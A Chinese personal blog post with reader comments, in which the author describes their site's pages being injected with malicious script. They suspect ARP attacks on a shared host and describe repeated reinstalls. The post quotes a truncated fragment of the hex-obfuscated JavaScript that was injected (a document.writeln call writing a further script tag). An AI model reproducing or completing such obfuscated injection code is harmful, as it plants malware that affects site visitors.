大前天忽然发现博客中招了,所有得网页都被加上了代码:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74\x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\。因为当时正是中考阅卷期间,没办法赶回来,就想网吧修复。弄了一个多小时,网吧限制这限制那,最后无功而返。郁闷啊!
前天下午阅卷完毕。回到家第一件事修复网页。可设计涉及网页太多,所以FTP进去后没有逐个清理,将程序重装了一下,也没细想中招原因。熟料,昨天下午又发现中招了。没办法,从头再来。相当郁闷啊!
为什中招的总是我呢?得查查原因了。
首先到z-blog上看了一下,发现论坛上也有其他人中招了。除了重建,也没人有什么好办法。当时怀疑是不是z-blog程序漏洞啊。可是论坛上中招的人很少,貌似不是。百度一下,才发现这是个老问题,似乎是ARP攻击,可能与服务器有关。又查看了一下,发现与我的博客同ip得网站也有其他的挂马的,于是昨晚与空间商联系了一下,不知道他们解决没有。
下午就考计算机,可这两天一直没得闲。爱咋着杂着吧,听天由命了。
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
现在的木马太厉害了点
要做好ghost,有了大的变化就备份,不行就恢复过来~~
这几天我那有点不正常,有时访问很慢。浅笑无声 于 2009-9-4 20:54:36 回复哦。我说呢。我用的是中国信网的。
唉,现在真的是防不胜防。就算是正规的软件商,也不能保证他们没乱来……
